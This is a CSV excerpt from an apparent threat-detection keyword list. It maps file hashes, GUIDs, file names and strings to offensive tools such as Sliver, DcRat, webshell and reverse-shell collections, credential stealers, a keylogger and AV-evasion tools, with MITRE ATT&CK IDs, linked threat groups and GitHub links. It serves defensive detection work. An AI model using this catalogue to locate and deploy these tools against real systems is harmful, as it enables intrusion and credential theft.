"*ab36a5c1f20df8fb1b59154aa6aa83bba2d29a6925fb9ec134457e7d1c95bb7a*",".{0,1000}ab36a5c1f20df8fb1b59154aa6aa83bba2d29a6925fb9ec134457e7d1c95bb7a.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","32973"
"*ab3fe5644df233ee6c10e09e60c7d8a7fa77aeb9eea8c99fd2a337f28e760258*",".{0,1000}ab3fe5644df233ee6c10e09e60c7d8a7fa77aeb9eea8c99fd2a337f28e760258.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","32975"
"*ab47f495f2c021122da927499eead371cb128e8eee96ba6e858ba5335e8cab57*",".{0,1000}ab47f495f2c021122da927499eead371cb128e8eee96ba6e858ba5335e8cab57.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","32977"
"*ab48a8d28e53fb65d460c4faa8cc44d8e00c9684b7fb4dd2598223d7e2963da6*",".{0,1000}ab48a8d28e53fb65d460c4faa8cc44d8e00c9684b7fb4dd2598223d7e2963da6.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","0","#filehash","N/A","10","","N/A","","","","32978"
"*ab495e19cd0752bcd83ae4f1ae0dff5ab09a756d63b22a64c718f87c04909142*",".{0,1000}ab495e19cd0752bcd83ae4f1ae0dff5ab09a756d63b22a64c718f87c04909142.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32979"
"*ab4ecda5fbd41bdd97780885ba1722c096482eb3e71caddd572de82c42b28aa6*",".{0,1000}ab4ecda5fbd41bdd97780885ba1722c096482eb3e71caddd572de82c42b28aa6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32982"
"*ab574153b5e7f7bef16f38ab53fcb107e2b1459426a73acf6fdd41434c94fa94*",".{0,1000}ab574153b5e7f7bef16f38ab53fcb107e2b1459426a73acf6fdd41434c94fa94.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","0","#filehash","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","32984"
"*ab606d61d0f3791fc8e0c64507a3210299d66e3bbefbe2101c4f7d8ca64aaf8f*",".{0,1000}ab606d61d0f3791fc8e0c64507a3210299d66e3bbefbe2101c4f7d8ca64aaf8f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32986"
"*ab64b46723ed98b58c91128f0e7fd806ed1a2fd47e1960ff12c68083893d86be*",".{0,1000}ab64b46723ed98b58c91128f0e7fd806ed1a2fd47e1960ff12c68083893d86be.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32987"
"*AB6CDF36-F336-4F14-8D69-3C190B7DEC65*",".{0,1000}AB6CDF36\-F336\-4F14\-8D69\-3C190B7DEC65.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","32989"
"*ab7aa0e4c923f767e50914842239578d36723656befca7bec7d40926bf79c3c3*",".{0,1000}ab7aa0e4c923f767e50914842239578d36723656befca7bec7d40926bf79c3c3.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","32992"
"*ab7c24fe58442c46ea47fe89b2b967d733d3a35e2f363af15ddfc82c6f680509*",".{0,1000}ab7c24fe58442c46ea47fe89b2b967d733d3a35e2f363af15ddfc82c6f680509.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","32993"
"*ab7d1d288bd6635e9fc098fb1a1b0dee7956ddd5b61b3a8444f0e8c8198e598a*",".{0,1000}ab7d1d288bd6635e9fc098fb1a1b0dee7956ddd5b61b3a8444f0e8c8198e598a.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","32994"
"*ab81070a84a4b8b80543cb31f3aa3829e325fbddef1ba9f048a99c1080b8ed71*",".{0,1000}ab81070a84a4b8b80543cb31f3aa3829e325fbddef1ba9f048a99c1080b8ed71.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32997"
"*ab816e6fa86f08ce0cadd09aa19335b5304f75a55f8fecfe917583650a12fe2c*",".{0,1000}ab816e6fa86f08ce0cadd09aa19335b5304f75a55f8fecfe917583650a12fe2c.{0,1000}","offensive_tool_keyword","COM-Object-hijacking","use COM Object hijacking to maintain persistence.(Hijack CAccPropServicesClass and MMDeviceEnumerator)","T1546.015","TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/COM-Object-hijacking","1","0","#filehash","N/A","8","1","58","30","2017-08-04T09:19:40Z","2017-08-04T08:15:36Z","32998"
"*ab835ce740890473adf5cc804055973b926633e39c59c2bd98da526b63e9c521*",".{0,1000}ab835ce740890473adf5cc804055973b926633e39c59c2bd98da526b63e9c521.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32999"
"*AB850676-3744-4BFD-82FA-E21D19622BF9*",".{0,1000}AB850676\-3744\-4BFD\-82FA\-E21D19622BF9.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","33002"
"*ab85375c8fcfcea1cf4135cc834b762c1006903496d70b795d4eb34cc6f754ec*",".{0,1000}ab85375c8fcfcea1cf4135cc834b762c1006903496d70b795d4eb34cc6f754ec.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","33003"
"*ab86676468036b6f915ffcefd6e05aa56bf02459a383c46dff095d5852a996e2*",".{0,1000}ab86676468036b6f915ffcefd6e05aa56bf02459a383c46dff095d5852a996e2.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","33004"
"*ab8ef44ac5829b0b14890ad48e4f015725748a0910f1d15aa0fdd5ed911ff7cf*",".{0,1000}ab8ef44ac5829b0b14890ad48e4f015725748a0910f1d15aa0fdd5ed911ff7cf.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","33008"
"*ab945e611084c9deccab6780df91caadf44977d54e61f621d2a5686a217a0a73*",".{0,1000}ab945e611084c9deccab6780df91caadf44977d54e61f621d2a5686a217a0a73.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","33009"
"*ab99bbfa0e8addfa9f389a05138f21c9976a07a984c74ea0066c6c2aefe2afde*",".{0,1000}ab99bbfa0e8addfa9f389a05138f21c9976a07a984c74ea0066c6c2aefe2afde.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","33010"
"*ab9be1fb31bcdae806b2396f6274a8c3fee03647adc9449c99e886c57b0d271d*",".{0,1000}ab9be1fb31bcdae806b2396f6274a8c3fee03647adc9449c99e886c57b0d271d.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","33012"
"*ab9bed9d63e2a83e2cea3d4a88311208a8032cb6b9be86876cea1a1fad870269*",".{0,1000}ab9bed9d63e2a83e2cea3d4a88311208a8032cb6b9be86876cea1a1fad870269.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","33013"
"*ab9f2bf9d733a41af5323b5cabe31812d43eef41cb6dcfea9ac47308c91428e3*",".{0,1000}ab9f2bf9d733a41af5323b5cabe31812d43eef41cb6dcfea9ac47308c91428e3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","33014"
"*abb2f26f4a3048ecb57a4329da21ce6fb438c4b22e49a31c0fd23ff4acc1bd68*",".{0,1000}abb2f26f4a3048ecb57a4329da21ce6fb438c4b22e49a31c0fd23ff4acc1bd68.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","33016"
"*abb8b93592a482b653c6d282ccad216f6cedc8bb50476aada7ee4b3562ecc9a4*",".{0,1000}abb8b93592a482b653c6d282ccad216f6cedc8bb50476aada7ee4b3562ecc9a4.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#filehash","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","33017"
"*abb92eca9ff99f47ecad47b9ca079ba9578b5cfdd1156a3e3b09ff43a76309ed*",".{0,1000}abb92eca9ff99f47ecad47b9ca079ba9578b5cfdd1156a3e3b09ff43a76309ed.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","33019"
"*ABC32DBD-B697-482D-A763-7BA82FE9CEA2*",".{0,1000}ABC32DBD\-B697\-482D\-A763\-7BA82FE9CEA2.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","0","#GUIDproject","N/A","10","2","164","29","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z","33020"
"*abc6b4e0f41a55ce44e359e7be8a5b4ee0e0174a8a4ecef0782081f7b2cee773*",".{0,1000}abc6b4e0f41a55ce44e359e7be8a5b4ee0e0174a8a4ecef0782081f7b2cee773.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","33021"
"*abccbb442f89dc0aeab5300964f546e81f4a1fbcb91f08b9e873da51bfd24b7f*",".{0,1000}abccbb442f89dc0aeab5300964f546e81f4a1fbcb91f08b9e873da51bfd24b7f.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","33023"
"*abccd127ce9c264980e3f8e8b040586a33dfe2c0e7d3e95bd79f383c09900cf9*",".{0,1000}abccd127ce9c264980e3f8e8b040586a33dfe2c0e7d3e95bd79f383c09900cf9.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","33024"
"*abd9f4b93fc3f2bb0612bfbdef4e0da8797e985e7377ee0c08c2b5b5198c2743*",".{0,1000}abd9f4b93fc3f2bb0612bfbdef4e0da8797e985e7377ee0c08c2b5b5198c2743.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","#filehash","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","33026"
"*abd9f4b93fc3f2bb0612bfbdef4e0da8797e985e7377ee0c08c2b5b5198c2743*",".{0,1000}abd9f4b93fc3f2bb0612bfbdef4e0da8797e985e7377ee0c08c2b5b5198c2743.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","33027"
"*abdfd724cc84b4f7c2fdd641acfc2427baad0e6eb6c031a53e0c25b17ebb550b*",".{0,1000}abdfd724cc84b4f7c2fdd641acfc2427baad0e6eb6c031a53e0c25b17ebb550b.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","33029"
"*abdullahansari1618@outlook.com*",".{0,1000}abdullahansari1618\@outlook\.com.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","0","#email","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","33030"
"*abe2f2b0a57474c206676b14aab4801779fbbd421357586ddadec94cc5d79707*",".{0,1000}abe2f2b0a57474c206676b14aab4801779fbbd421357586ddadec94cc5d79707.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","33032"
"*abe5927545e372ee51e2dd855cc1b927fe15073db14e72832d579d73d37be100*",".{0,1000}abe5927545e372ee51e2dd855cc1b927fe15073db14e72832d579d73d37be100.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","33033"
"*abeda25578952d37a4fdf1814b55799bc99ebd54643fa7608c34750832deb425*",".{0,1000}abeda25578952d37a4fdf1814b55799bc99ebd54643fa7608c34750832deb425.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","33034"
"*abef624f84b21fb45d4b9d39693863c6bf4e9ddb94830f797c129d03937a7f03*",".{0,1000}abef624f84b21fb45d4b9d39693863c6bf4e9ddb94830f797c129d03937a7f03.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","33035"
"*ABF5940C-60AC-4892-B3F0-0F9262C550B3*",".{0,1000}ABF5940C\-60AC\-4892\-B3F0\-0F9262C550B3.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#GUIDProject","N/A","9","","N/A","","","","33036"
"*abfd0a70ecabaaa68a9f51b548542577c3859268b352c92cb7d9fa1caf6c3168*",".{0,1000}abfd0a70ecabaaa68a9f51b548542577c3859268b352c92cb7d9fa1caf6c3168.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","33037"
"*abfd58bdd84c727b71ed7091ae3865a774c9d838b3eaf1a6b249119234d83a71*",".{0,1000}abfd58bdd84c727b71ed7091ae3865a774c9d838b3eaf1a6b249119234d83a71.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","33038"
"*abfd58bdd84c727b71ed7091ae3865a774c9d838b3eaf1a6b249119234d83a71*",".{0,1000}abfd58bdd84c727b71ed7091ae3865a774c9d838b3eaf1a6b249119234d83a71.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","33039"
"*abfd58bdd84c727b71ed7091ae3865a774c9d838b3eaf1a6b249119234d83a71*",".{0,1000}abfd58bdd84c727b71ed7091ae3865a774c9d838b3eaf1a6b249119234d83a71.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","33040"
"*abfd58bdd84c727b71ed7091ae3865a774c9d838b3eaf1a6b249119234d83a71*",".{0,1000}abfd58bdd84c727b71ed7091ae3865a774c9d838b3eaf1a6b249119234d83a71.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","33041"
"*abopscript.txt*",".{0,1000}abopscript\.txt.{0,1000}","offensive_tool_keyword","EQGR","Equation Group scripts and tools","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Exploitation tool","https://fdik.org/EQGRP/Linux/doc/old/etc/abopscript.txt","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","33042"
"*About to download Metasploit payload *",".{0,1000}About\sto\sdownload\sMetasploit\spayload\s.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","33043"
"*abpttsclient.py*",".{0,1000}abpttsclient\.py.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","1","N/A","N/A","9","8","735","151","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z","33044"
"*ABPTTSClient-log.txt*",".{0,1000}ABPTTSClient\-log\.txt.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","1","N/A","N/A","9","8","735","151","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z","33045"
